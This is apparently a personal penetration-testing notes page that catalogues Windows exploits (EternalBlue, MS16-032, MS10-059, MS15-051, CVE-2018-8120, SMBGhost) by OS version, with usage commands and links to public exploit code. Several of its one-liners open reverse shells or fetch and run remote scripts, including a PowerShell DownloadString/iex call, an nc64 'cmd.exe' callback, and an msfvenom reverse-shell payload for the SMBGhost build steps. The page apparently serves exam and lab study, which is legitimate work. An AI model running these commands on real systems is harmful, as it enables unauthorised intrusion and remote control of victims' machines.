kashz jewels
about kashz
oscp exam review
pnpt exam review
certification exam
c2 frameworks
kashz-kali
OS-LINUX
OS-WINDOWS
SHELLCODES
- shells
- windows shells
ACTIVE-DIRECTORY
OSINT
- osint
BUFFER OVERFLOW GUIDE
HASH-n-CRACK
TRICKS
PROTOCOLS
ATTACKS
CHEATSHEET
SERVICES

Powered by GitBook

On this page

MS08-067 Exploit
MS-17-010 EternalBlue Exploit
MS-16-032 Exploit
Windows 7
MS09-050 'srv2.sys' SMB Code Execution (Python)
MS09-002 Memory Corruption IE7 Exploit
Windows Server 2008 R2 SP1
Windows 7 SP1
Windows Server 2008 SP1
Windows Server 2003
Windows Server 2012 R2 Standard
Windows Server 2008 R2
Windows XP SP1
CVE-2020-0796 | smbhghost
Steps:

Was this helpful?

SERVICES

windows exploits

Previouswindows UsoSvc service Nextwindows iot core

Last updated 3 years ago

Was this helpful?

MS08-067 Exploit

MS-17-010 EternalBlue Exploit

msf:
- checker: use auxiliary/scanner/smb/smb_ms17_010
- exploit: use exploit/windows/sbm/ms17_010_eternalblue
- no pipes needed | manual method
- update username as guest / anonymous (if needed)
- python send_and_execute.py TARGET_IP SHELL.exe
- ensure to run pre requisites
- python zzz_exploit.py TARGET_IP

MS-16-032 Exploit

- Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"

Windows 7

MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- MS10-059.exe KALI_IP PORT

MS09-050 'srv2.sys' SMB Code Execution (Python)

MS09-002 Memory Corruption IE7 Exploit

msf: use windows/browser/ms09_002_memory_corruption

Windows Server 2008 R2 SP1

CVE-2018-8120
Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

Windows 7 SP1

CVE-2018-8120
- Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode

Windows Server 2008 SP1

CVE-2018-8120
- Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- MS10-059.exe KALI_IP PORT

Windows Server 2003

MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- MS10-059.exe KALI_IP PORT

Windows Server 2012 R2 Standard

MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600

Windows Server 2008 R2

MS15-05
- ms15-051.exe "nc64.exe -c cmd.exe IP PORT"
MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
- MS10-059.exe KALI_IP PORT

Windows XP SP1

Local PE using Windows Services (upnphost and SSDPSRV)

CVE-2020-0796 | smbhghost

REQUIREMENTS:

needs smb port:445 open

Steps:

Generate shellcode using msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp
Update shellcode on line 204 file: exploit.cpp
Set TARGET_ARCH and set for RELEASE
Build solution
Run cve-2020-0796-local.exe

https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py

https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067_w2k3_sp2.py

eternalblue_manual_exploit

helviojunior/MS17-010.git

3ndG4me/AutoBlue-MS17-010

exploit-db/42315

EmpireProject/Invoke-MS16032.ps1

abatchy17/MS11-046

egre55/MS10-059:%20Chimichurri/Compiled

exploit-db/40280

SecWiki/CVE-2018-8120

SecWiki/CVE-2018-8120

SecWiki/CVE-2018-8120

egre55/MS10-059:%20Chimichurri/Compiled

egre55/MS10-059:%20Chimichurri/Compiled

SecWiki/MS16-098

SecWiki/MS15-051/MS15-051-KB3045171.zip

egre55/MS10-059:%20Chimichurri/Compiled

https://sohvaxus.github.io/content/winxp-sp1-privesc.html

danigargu/CVE-2020-0796